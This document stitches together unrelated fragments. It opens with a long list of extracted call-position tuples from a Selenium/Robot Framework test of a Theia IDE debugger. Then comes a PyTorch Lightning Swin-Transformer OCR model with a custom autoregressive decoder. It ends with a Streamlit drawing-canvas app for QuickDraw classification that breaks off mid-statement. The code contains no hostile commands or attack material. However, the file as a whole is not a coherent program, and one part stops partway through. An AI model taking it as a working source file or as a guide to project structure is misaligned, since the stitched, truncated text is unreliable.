[((3175, 3190), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {}), '()\n', (3188, 3190), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((3465, 3531), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_HUGE_TIMEOUT', 'interval': '(10)'}), '(timeout=constants.DEFAULT_HUGE_TIMEOUT, interval=10)\n', (3478, 3531), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((8564, 8617), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_LONG_TIMEOUT'}), '(timeout=constants.DEFAULT_LONG_TIMEOUT)\n', (8577, 8617), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((9264, 9279), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {}), '()\n', (9277, 9279), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((9549, 9603), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (9562, 9603), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((11743, 11797), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (11756, 11797), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((12368, 12422), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT)\n', (12381, 12422), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((13180, 13273), 'inc.decorators.wait_till_exist.WaitTillExist', 'WaitTillExist', ([], {'timeout': 'constants.DEFAULT_SHORT_TIMEOUT', 'should_exist': '(False)', 'do_dump': '(False)'}), '(timeout=constants.DEFAULT_SHORT_TIMEOUT, should_exist=False,\n do_dump=False)\n', 
(13193, 13273), False, 'from inc.decorators.wait_till_exist import WaitTillExist\n'), ((15526, 15572), 'robot.api.deco.keyword', 'keyword', (['"""Get Syntax Ok Message For ${member}"""'], {}), "('Get Syntax Ok Message For ${member}')\n", (15533, 15572), False, 'from robot.api.deco import keyword\n'), ((15751, 15772), 'robot.api.deco.keyword', 'keyword', (['"""Get Editor"""'], {}), "('Get Editor')\n", (15758, 15772), False, 'from robot.api.deco import keyword\n'), ((15880, 15915), 'robot.api.deco.keyword', 'keyword', (['"""See ${text} In Statusbar"""'], {}), "('See ${text} In Statusbar')\n", (15887, 15915), False, 'from robot.api.deco import keyword\n'), ((18270, 18304), 'robot.api.deco.keyword', 'keyword', (['"""Modify User Preferences"""'], {}), "('Modify User Preferences')\n", (18277, 18304), False, 'from robot.api.deco import keyword\n'), ((2589, 2622), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (2620, 2622), False, 'from inc.theia.ui import UI\n'), ((2841, 2868), 'inc.helpers.highlight', 'highlight', (['theia_left_panel'], {}), '(theia_left_panel)\n', (2850, 2868), False, 'from inc.helpers import highlight\n'), ((3638, 3677), 'inc.theia.ui.UI.get_theia_left_right_panel_locator', 'UI.get_theia_left_right_panel_locator', ([], {}), '()\n', (3675, 3677), False, 'from inc.theia.ui import UI\n'), ((4014, 4041), 'inc.helpers.highlight', 'highlight', (['debug_id_element'], {}), '(debug_id_element)\n', (4023, 4041), False, 'from inc.helpers import highlight\n'), ((4200, 4228), 'inc.theia.ui.UI.get_debug_start_locator', 'UI.get_debug_start_locator', ([], {}), '()\n', (4226, 4228), False, 'from inc.theia.ui import UI\n'), ((4420, 4453), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (4451, 4453), False, 'from inc.theia.ui import UI\n'), ((4595, 4639), 'inc.helpers.highlight', 'highlight', (['debug_start_button'], {'effect_time': '(1)'}), '(debug_start_button, 
effect_time=1)\n', (4604, 4639), False, 'from inc.helpers import highlight\n'), ((4748, 4777), 'inc.theia.ui.UI.get_debug_thread_locator', 'UI.get_debug_thread_locator', ([], {}), '()\n', (4775, 4777), False, 'from inc.theia.ui import UI\n'), ((5132, 5164), 'inc.theia.ui.UI.get_debug_step_over_locator', 'UI.get_debug_step_over_locator', ([], {}), '()\n', (5162, 5164), False, 'from inc.theia.ui import UI\n'), ((5452, 5490), 'inc.theia.ui.UI.get_debug_top_stack_frame_locator', 'UI.get_debug_top_stack_frame_locator', ([], {}), '()\n', (5488, 5490), False, 'from inc.theia.ui import UI\n'), ((5564, 5602), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (5573, 5602), False, 'from inc.helpers import highlight\n'), ((5628, 5661), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (5659, 5661), False, 'from inc.theia.ui import UI\n'), ((5811, 5859), 'inc.helpers.highlight', 'highlight', (['debug_step_over_button'], {'effect_time': '(1)'}), '(debug_step_over_button, effect_time=1)\n', (5820, 5859), False, 'from inc.helpers import highlight\n'), ((6843, 6881), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (6852, 6881), False, 'from inc.helpers import highlight\n'), ((6999, 7030), 'inc.theia.ui.UI.get_debug_continue_locator', 'UI.get_debug_continue_locator', ([], {}), '()\n', (7028, 7030), False, 'from inc.theia.ui import UI\n'), ((7312, 7350), 'inc.theia.ui.UI.get_debug_top_stack_frame_locator', 'UI.get_debug_top_stack_frame_locator', ([], {}), '()\n', (7348, 7350), False, 'from inc.theia.ui import UI\n'), ((7524, 7557), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (7555, 7557), False, 'from inc.theia.ui import UI\n'), ((7705, 7752), 'inc.helpers.highlight', 'highlight', (['debug_continue_button'], {'effect_time': '(1)'}), 
'(debug_continue_button, effect_time=1)\n', (7714, 7752), False, 'from inc.helpers import highlight\n'), ((8483, 8521), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (8492, 8521), False, 'from inc.helpers import highlight\n'), ((8680, 8713), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (8711, 8713), False, 'from inc.theia.ui import UI\n'), ((8795, 8824), 'inc.theia.ui.UI.get_debug_thread_locator', 'UI.get_debug_thread_locator', ([], {}), '()\n', (8822, 8824), False, 'from inc.theia.ui import UI\n'), ((9970, 10012), 'inc.helpers.highlight', 'highlight', (['variables_header'], {'effect_time': '(1)'}), '(variables_header, effect_time=1)\n', (9979, 10012), False, 'from inc.helpers import highlight\n'), ((10135, 10180), 'inc.helpers.highlight', 'highlight', (['variables_container'], {'effect_time': '(1)'}), '(variables_container, effect_time=1)\n', (10144, 10180), False, 'from inc.helpers import highlight\n'), ((13873, 13900), 'inc.theia.ui.UI.get_debug_stop_locator', 'UI.get_debug_stop_locator', ([], {}), '()\n', (13898, 13900), False, 'from inc.theia.ui import UI\n'), ((14086, 14119), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (14117, 14119), False, 'from inc.theia.ui import UI\n'), ((14585, 14628), 'inc.helpers.highlight', 'highlight', (['debug_stop_button'], {'effect_time': '(1)'}), '(debug_stop_button, effect_time=1)\n', (14594, 14628), False, 'from inc.helpers import highlight\n'), ((15652, 15716), 'inc.theia.lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format', 'lsp_constants.LSP_COBOL_MEMBER_SYNTAX_OK_TEMPLATE.format', (['member'], {}), '(member)\n', (15708, 15716), False, 'from inc.theia import constants, lsp_constants\n'), ((17732, 17763), 'pyperclip.determine_clipboard', 'pyperclip.determine_clipboard', ([], {}), '()\n', (17761, 17763), False, 'import pyperclip\n'), 
((17809, 17827), 'pyperclip.copy', 'pyperclip.copy', (['""""""'], {}), "('')\n", (17823, 17827), False, 'import pyperclip\n'), ((17907, 17924), 'pyperclip.paste', 'pyperclip.paste', ([], {}), '()\n', (17922, 17924), False, 'import pyperclip\n'), ((18138, 18163), 'json.dumps', 'json.dumps', (['res'], {'indent': '(3)'}), '(res, indent=3)\n', (18148, 18163), False, 'import json\n'), ((18224, 18245), 'pyperclip.copy', 'pyperclip.copy', (['value'], {}), '(value)\n', (18238, 18245), False, 'import pyperclip\n'), ((18527, 18558), 'json.dumps', 'json.dumps', (['pref_dict'], {'indent': '(3)'}), '(pref_dict, indent=3)\n', (18537, 18558), False, 'import json\n'), ((1640, 1673), 'inc.theia.ui.UI.get_theia_left_panel_locator', 'UI.get_theia_left_panel_locator', ([], {}), '()\n', (1671, 1673), False, 'from inc.theia.ui import UI\n'), ((2705, 2767), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['theia_locator'], {}), '(theia_locator)\n', (2752, 2767), False, 'from selenium.webdriver.support import expected_conditions\n'), ((3763, 3785), 'inc.helpers.highlight', 'highlight', (['theia_panel'], {}), '(theia_panel)\n', (3772, 3785), False, 'from inc.helpers import highlight\n'), ((4316, 4384), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_start_locator'], {}), '(debug_start_locator)\n', (4363, 4384), False, 'from selenium.webdriver.support import expected_conditions\n'), ((4865, 4934), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_thread_locator'], {}), '(debug_thread_locator)\n', (4912, 4934), False, 'from selenium.webdriver.support import expected_conditions\n'), ((5252, 5324), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', 
(['debug_step_over_locator'], {}), '(debug_step_over_locator)\n', (5299, 5324), False, 'from selenium.webdriver.support import expected_conditions\n'), ((6580, 6641), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['step_locator'], {}), '(step_locator)\n', (6627, 6641), False, 'from selenium.webdriver.support import expected_conditions\n'), ((7113, 7184), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_continue_locator'], {}), '(debug_continue_locator)\n', (7160, 7184), False, 'from selenium.webdriver.support import expected_conditions\n'), ((7460, 7498), 'inc.helpers.highlight', 'highlight', (['step_element'], {'effect_time': '(1)'}), '(step_element, effect_time=1)\n', (7469, 7498), False, 'from inc.helpers import highlight\n'), ((8208, 8269), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['step_locator'], {}), '(step_locator)\n', (8255, 8269), False, 'from selenium.webdriver.support import expected_conditions\n'), ((8934, 8959), 'inc.helpers.highlight', 'highlight', (['thread_element'], {}), '(thread_element)\n', (8943, 8959), False, 'from inc.helpers import highlight\n'), ((9375, 9414), 'inc.theia.ui.UI.get_debug_console_variable_locator', 'UI.get_debug_console_variable_locator', ([], {}), '()\n', (9412, 9414), False, 'from inc.theia.ui import UI\n'), ((10220, 10254), 'inc.theia.ui.UI.get_tree_node_content_locator', 'UI.get_tree_node_content_locator', ([], {}), '()\n', (10252, 10254), False, 'from inc.theia.ui import UI\n'), ((10839, 10881), 'inc.helpers.highlight', 'highlight', (['variable_element'], {'effect_time': '(1)'}), '(variable_element, effect_time=1)\n', (10848, 10881), False, 'from inc.helpers import highlight\n'), ((11892, 11927), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 
'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (11925, 11927), False, 'from inc.theia.ui import UI\n'), ((11965, 12000), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (11998, 12000), False, 'from inc.theia.ui import UI\n'), ((12164, 12201), 'inc.theia.ui.UI.get_theia_dialog_content_locator', 'UI.get_theia_dialog_content_locator', ([], {}), '()\n', (12199, 12201), False, 'from inc.theia.ui import UI\n'), ((12505, 12540), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (12538, 12540), False, 'from inc.theia.ui import UI\n'), ((12578, 12613), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (12611, 12613), False, 'from inc.theia.ui import UI\n'), ((12777, 12814), 'inc.theia.ui.UI.get_theia_dialog_control_locator', 'UI.get_theia_dialog_control_locator', ([], {}), '()\n', (12812, 12814), False, 'from inc.theia.ui import UI\n'), ((12878, 12902), 'inc.theia.ui.UI.get_buttons_locator', 'UI.get_buttons_locator', ([], {}), '()\n', (12900, 12902), False, 'from inc.theia.ui import UI\n'), ((13539, 13562), 'inc.helpers.highlight', 'highlight', (['dialog_title'], {}), '(dialog_title)\n', (13548, 13562), False, 'from inc.helpers import highlight\n'), ((13983, 14050), 'selenium.webdriver.support.expected_conditions.presence_of_element_located', 'expected_conditions.presence_of_element_located', (['debug_stop_locator'], {}), '(debug_stop_locator)\n', (14030, 14050), False, 'from selenium.webdriver.support import expected_conditions\n'), ((16005, 16037), 'inc.theia.ui.UI.get_theia_statusbar_locator', 'UI.get_theia_statusbar_locator', ([], {}), '()\n', (16035, 16037), False, 'from inc.theia.ui import UI\n'), ((16087, 16111), 'inc.theia.ui.UI.get_status_elements', 'UI.get_status_elements', ([], {}), '()\n', (16109, 16111), False, 'from inc.theia.ui import UI\n'), ((18038, 18053), 'json.loads', 'json.loads', 
(['res'], {}), '(res)\n', (18048, 18053), False, 'import json\n'), ((18412, 18433), 'json.loads', 'json.loads', (['pref_dict'], {}), '(pref_dict)\n', (18422, 18433), False, 'import json\n'), ((1897, 1928), 'inc.theia.ui.UI.get_files_explorer_locator', 'UI.get_files_explorer_locator', ([], {}), '()\n', (1926, 1928), False, 'from inc.theia.ui import UI\n'), ((2631, 2685), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (2644, 2685), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((2915, 2941), 'inc.theia.ui.UI.get_debug_tab_locator', 'UI.get_debug_tab_locator', ([], {}), '()\n', (2939, 2941), False, 'from inc.theia.ui import UI\n'), ((3325, 3360), 'inc.theia.ui.UI.get_files_explorer_tab_locator', 'UI.get_files_explorer_tab_locator', ([], {}), '()\n', (3358, 3360), False, 'from inc.theia.ui import UI\n'), ((4237, 4296), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (4250, 4296), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((4786, 4845), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (4799, 4845), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((5173, 5232), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_LONG_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_LONG_TIMEOUT)\n', (5186, 5232), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((6367, 6432), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'expected_conditions.invisibility_of_element_located', (['step_locator'], {}), '(step_locator)\n', (6418, 6432), 
False, 'from selenium.webdriver.support import expected_conditions\n'), ((6506, 6560), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (6519, 6560), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7039, 7093), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (7052, 7093), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7995, 8060), 'selenium.webdriver.support.expected_conditions.invisibility_of_element_located', 'expected_conditions.invisibility_of_element_located', (['step_locator'], {}), '(step_locator)\n', (8046, 8060), False, 'from selenium.webdriver.support import expected_conditions\n'), ((8134, 8188), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (8147, 8188), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((10424, 10454), 'inc.theia.constants.THEIA_LOCALS.upper', 'constants.THEIA_LOCALS.upper', ([], {}), '()\n', (10452, 10454), False, 'from inc.theia import constants, lsp_constants\n'), ((13058, 13078), 'inc.theia.constants.OK.upper', 'constants.OK.upper', ([], {}), '()\n', (13076, 13078), False, 'from inc.theia import constants, lsp_constants\n'), ((13392, 13427), 'inc.theia.ui.UI.get_theia_dialog_shell_locator', 'UI.get_theia_dialog_shell_locator', ([], {}), '()\n', (13425, 13427), False, 'from inc.theia.ui import UI\n'), ((13469, 13504), 'inc.theia.ui.UI.get_theia_dialog_title_locator', 'UI.get_theia_dialog_title_locator', ([], {}), '()\n', (13502, 13504), False, 'from inc.theia.ui import UI\n'), ((13775, 13805), 'selenium.common.exceptions.WebDriverException', 'WebDriverException', ([], {'msg': 'e.args'}), '(msg=e.args)\n', (13793, 
13805), False, 'from selenium.common.exceptions import NoSuchElementException, WebDriverException, TimeoutException\n'), ((13909, 13963), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_TIMEOUT)\n', (13922, 13963), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((16266, 16313), 'inc.helpers.highlight', 'highlight', (['elements_with_command'], {'effect_time': '(1)'}), '(elements_with_command, effect_time=1)\n', (16275, 16313), False, 'from inc.helpers import highlight\n'), ((3141, 3167), 'inc.theia.ui.UI.get_debug_tab_locator', 'UI.get_debug_tab_locator', ([], {}), '()\n', (3165, 3167), False, 'from inc.theia.ui import UI\n'), ((6283, 6343), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_SHORT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_SHORT_TIMEOUT)\n', (6296, 6343), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((7911, 7971), 'selenium.webdriver.support.wait.WebDriverWait', 'WebDriverWait', (['self._driver', 'constants.DEFAULT_SHORT_TIMEOUT'], {}), '(self._driver, constants.DEFAULT_SHORT_TIMEOUT)\n', (7924, 7971), False, 'from selenium.webdriver.support.wait import WebDriverWait\n'), ((15040, 15083), 'inc.helpers.highlight', 'highlight', (['debug_stop_button'], {'effect_time': '(1)'}), '(debug_stop_button, effect_time=1)\n', (15049, 15083), False, 'from inc.helpers import highlight\n')]
|
import torch
import random
import pytorch_lightning as pl
from x_transformers import *
from x_transformers.autoregressive_wrapper import *
from timm.models.swin_transformer import SwinTransformer
import utils
class SwinTransformerOCR(pl.LightningModule):
    """Lightning module pairing a Swin-Transformer image encoder with an
    autoregressive transformer decoder for text recognition (OCR).

    `cfg` supplies all hyper-parameters; `tokenizer` maps between text and
    token ids (its length defines the decoder vocabulary size).
    """
    def __init__(self, cfg, tokenizer):
        super().__init__()
        self.cfg = cfg
        self.tokenizer = tokenizer
        # Encoder: Swin transformer with the classification head disabled
        # (num_classes=0) so it yields a feature sequence for the decoder.
        self.encoder = CustomSwinTransformer( img_size=(cfg.height, cfg.width),
                                               patch_size=cfg.patch_size,
                                               in_chans=cfg.channels,
                                               num_classes=0,
                                               window_size=cfg.window_size,
                                               embed_dim=cfg.encoder_dim,
                                               depths=cfg.encoder_depth,
                                               num_heads=cfg.encoder_heads
                                               )
        # Decoder: autoregressive wrapper around a transformer decoder that
        # attends to the encoder output (passed as `context` below).
        self.decoder = CustomARWrapper(
                        TransformerWrapper(
                            num_tokens=len(tokenizer),
                            max_seq_len=cfg.max_seq_len,
                            attn_layers=Decoder(
                                dim=cfg.decoder_dim,
                                depth=cfg.decoder_depth,
                                heads=cfg.decoder_heads,
                                **cfg.decoder_cfg
                            )),
                        pad_value=cfg.pad_token
                        )
        # Special-token ids and generation settings used by forward().
        self.bos_token = cfg.bos_token
        self.eos_token = cfg.eos_token
        self.max_seq_len = cfg.max_seq_len
        self.temperature = cfg.temperature
    def configure_optimizers(self):
        """Build the optimizer and a learning-rate scheduler from cfg.

        cfg.optimizer names a class in torch.optim; cfg.scheduler names one
        in torch.optim.lr_scheduler or in the local `utils` module.  When no
        scheduler is configured, a constant LambdaLR is returned so the
        learning rate is still logged per epoch.
        """
        optimizer = getattr(torch.optim, self.cfg.optimizer)
        optimizer = optimizer(self.parameters(), lr=float(self.cfg.lr))
        if not self.cfg.scheduler:
            # Identity lambda keeps the LR constant while remaining loggable.
            scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda x: 1)
            scheduler = {
                'scheduler': scheduler, 'interval': "epoch", "name": "learning rate"
            }
            return [optimizer], [scheduler]
        elif hasattr(torch.optim.lr_scheduler, self.cfg.scheduler):
            scheduler = getattr(torch.optim.lr_scheduler, self.cfg.scheduler)
        elif hasattr(utils, self.cfg.scheduler):
            scheduler = getattr(utils, self.cfg.scheduler)
        else:
            raise ModuleNotFoundError
        scheduler = {
            'scheduler': scheduler(optimizer, **self.cfg.scheduler_param),
            'interval': self.cfg.scheduler_interval,
            'name': "learning rate"
        }
        return [optimizer], [scheduler]
    def forward(self, x):
        '''
        Encode a batch of images and autoregressively decode token ids.
        x: (B, C, W, H)
        labels: (B, S)
        # B : batch size
        # W : image width
        # H : image height
        # S : source sequence length
        # E : hidden size
        # V : vocab size
        '''
        encoded = self.encoder(x)
        # Seed each sequence with <bos>; generation stops at <eos> or
        # after max_seq_len tokens.
        dec = self.decoder.generate(torch.LongTensor([self.bos_token]*len(x))[:, None].to(x.device), self.max_seq_len,
                                    eos_token=self.eos_token, context=encoded, temperature=self.temperature)
        return dec
    def training_step(self, batch, batch_num):
        """One optimization step: teacher-forced decoder loss on (image, text)."""
        x, y = batch
        tgt_seq, tgt_mask = y
        encoded = self.encoder(x)
        loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded)
        self.log("train_loss", loss)
        return {'loss': loss}
    def validation_step(self, batch, batch_num):
        """Validation loss plus decoded predictions and exact-match accuracy."""
        x, y = batch
        tgt_seq, tgt_mask = y
        encoded = self.encoder(x)
        loss = self.decoder(tgt_seq, mask=tgt_mask, context=encoded)
        # Decode from scratch (no teacher forcing) for the accuracy metric.
        dec = self.decoder.generate((torch.ones(x.size(0),1)*self.bos_token).long().to(x.device), self.max_seq_len,
                                    eos_token=self.eos_token, context=encoded, temperature=self.temperature)
        gt = self.tokenizer.decode(tgt_seq)
        pred = self.tokenizer.decode(dec)
        assert len(gt) == len(pred)
        # Fraction of exactly matching ground-truth/prediction string pairs.
        acc = sum([1 if gt[i] == pred[i] else 0 for i in range(len(gt))]) / x.size(0)
        return {'val_loss': loss,
                'results' : {
                    'gt' : gt,
                    'pred' : pred
                },
                'acc': acc
                }
    def validation_epoch_end(self, outputs):
        """Aggregate epoch metrics and log a sample of mispredicted cases."""
        val_loss = sum([x['val_loss'] for x in outputs]) / len(outputs)
        acc = sum([x['acc'] for x in outputs]) / len(outputs)
        wrong_cases = []
        for output in outputs:
            for i in range(len(output['results']['gt'])):
                gt = output['results']['gt'][i]
                pred = output['results']['pred'][i]
                if gt != pred:
                    wrong_cases.append("|gt:{}/pred:{}|".format(gt, pred))
        # Keep at most batch_size // 2 randomly chosen failures for the log.
        wrong_cases = random.sample(wrong_cases, min(len(wrong_cases), self.cfg.batch_size//2))
        self.log('val_loss', val_loss)
        self.log('accuracy', acc)
        # custom text logging
        self.logger.log_text("wrong_case", "___".join(wrong_cases), self.global_step)
    @torch.no_grad()
    def predict(self, image):
        """Inference helper: decode `image` and return the detokenized text."""
        dec = self(image)
        pred = self.tokenizer.decode(dec)
        return pred
class CustomSwinTransformer(SwinTransformer):
    """Swin encoder variant that remembers the (height, width) it was built
    with and returns the full patch-feature sequence instead of a pooled
    classification feature."""

    def __init__(self, img_size=224, *cfg, **kwcfg):
        super().__init__(img_size=img_size, *cfg, **kwcfg)
        # img_size is expected to be a (height, width) pair here.
        self.height, self.width = img_size

    def forward_features(self, x):
        # Patch embedding -> dropout -> transformer stages -> final norm,
        # skipping timm's pooling so the result keeps shape (B, L, C).
        for stage in (self.patch_embed, self.pos_drop, self.layers, self.norm):
            x = stage(x)
        return x
class CustomARWrapper(AutoregressiveWrapper):
    """AutoregressiveWrapper with a `generate` that supports an attention
    mask and cross-attention context (forwarded through **kwcfg)."""
    def __init__(self, *cfg, **kwcfg):
        super(CustomARWrapper, self).__init__(*cfg, **kwcfg)
    @torch.no_grad()
    def generate(self, start_tokens, seq_len, eos_token=None, temperature=1., filter_logits_fn=top_k, filter_thres=0.9, **kwcfg):
        """Sample up to `seq_len` tokens after `start_tokens`.

        Stops early once every sequence in the batch has produced
        `eos_token`.  Returns only the newly generated tokens (the prompt
        is stripped), squeezed back to 1-D if the input was 1-D.
        """
        was_training = self.net.training
        num_dims = len(start_tokens.shape)
        # Accept a single unbatched sequence; add the batch dimension.
        if num_dims == 1:
            start_tokens = start_tokens[None, :]
        b, t = start_tokens.shape
        self.net.eval()
        out = start_tokens
        # Default mask: attend to every prompt position.
        mask = kwcfg.pop('mask', None)
        if mask is None:
            mask = torch.full_like(out, True, dtype=torch.bool, device=out.device)
        for _ in range(seq_len):
            # Sliding window: only the last max_seq_len tokens feed the net.
            x = out[:, -self.max_seq_len:]
            mask = mask[:, -self.max_seq_len:]
            logits = self.net(x, mask=mask, **kwcfg)[:, -1, :]
            # Filter the distribution (top-k / top-p) before sampling;
            # entmax computes its own sparse distribution directly.
            if filter_logits_fn in {top_k, top_p}:
                filtered_logits = filter_logits_fn(logits, thres=filter_thres)
                probs = F.softmax(filtered_logits / temperature, dim=-1)
            elif filter_logits_fn is entmax:
                probs = entmax(logits / temperature, alpha=ENTMAX_ALPHA, dim=-1)
            sample = torch.multinomial(probs, 1)
            out = torch.cat((out, sample), dim=-1)
            mask = F.pad(mask, (0, 1), value=True)
            # Stop when every batch row contains at least one eos_token.
            if eos_token is not None and (torch.cumsum(out == eos_token, 1)[:, -1] >= 1).all():
                break
        # Drop the prompt, keep only generated tokens.
        out = out[:, t:]
        if num_dims == 1:
            out = out.squeeze(0)
        # Restore the caller's train/eval mode.
        self.net.train(was_training)
        return out
|
[
"torch.full_like",
"torch.multinomial",
"torch.cat",
"torch.cumsum",
"torch.optim.lr_scheduler.LambdaLR",
"torch.no_grad"
] |
[((5152, 5167), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5165, 5167), False, 'import torch\n'), ((5846, 5861), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5859, 5861), False, 'import torch\n'), ((1920, 1987), 'torch.optim.lr_scheduler.LambdaLR', 'torch.optim.lr_scheduler.LambdaLR', (['optimizer'], {'lr_lambda': '(lambda x: 1)'}), '(optimizer, lr_lambda=lambda x: 1)\n', (1953, 1987), False, 'import torch\n'), ((6322, 6385), 'torch.full_like', 'torch.full_like', (['out', '(True)'], {'dtype': 'torch.bool', 'device': 'out.device'}), '(out, True, dtype=torch.bool, device=out.device)\n', (6337, 6385), False, 'import torch\n'), ((6927, 6954), 'torch.multinomial', 'torch.multinomial', (['probs', '(1)'], {}), '(probs, 1)\n', (6944, 6954), False, 'import torch\n'), ((6974, 7006), 'torch.cat', 'torch.cat', (['(out, sample)'], {'dim': '(-1)'}), '((out, sample), dim=-1)\n', (6983, 7006), False, 'import torch\n'), ((7101, 7134), 'torch.cumsum', 'torch.cumsum', (['(out == eos_token)', '(1)'], {}), '(out == eos_token, 1)\n', (7113, 7134), False, 'import torch\n')]
|
import streamlit as st
from streamlit_drawable_canvas import st_canvas
from PIL import Image
import numpy as np
import torch
import torch.nn.functional as F
import torchvision.transforms as transforms
import json
# Specify canvas parameters in application
# Brush thickness (pixels) for the drawing strokes.
stroke_width = st.sidebar.slider(
    label='Stroke width:',
    min_value=1,
    max_value=25,
    value=3
)
# Which drawing primitive the canvas uses.
drawing_mode = st.sidebar.selectbox(
    label='Drawing tool:',
    options=('freedraw', 'line', 'rect', 'circle', 'transform')
)
# If True, the canvas pushes updates to Streamlit on every change.
realtime_update = st.sidebar.checkbox(
    label='Update in realtime',
    value=True
)
# Create a canvas component
# canvas_result.image_data holds the drawn image (consumed below).
canvas_result = st_canvas(
    stroke_width=stroke_width,
    stroke_color='black',
    update_streamlit=realtime_update,
    height=400,
    width=400,
    drawing_mode=drawing_mode,
    key='canvas',
)
@st.cache
def load_model():
    """Load the trained classifier once per session (cached by Streamlit).

    The checkpoint is mapped to CPU so the app also runs without a GPU.
    """
    model = torch.load(
        f='quickdraw/models/model.pt',
        map_location=torch.device('cpu')
    )
    return model
model = load_model()
# Same preprocessing as training: tensor conversion + normalization with
# the dataset statistics.
transform = transforms.Compose([
    transforms.ToTensor(),
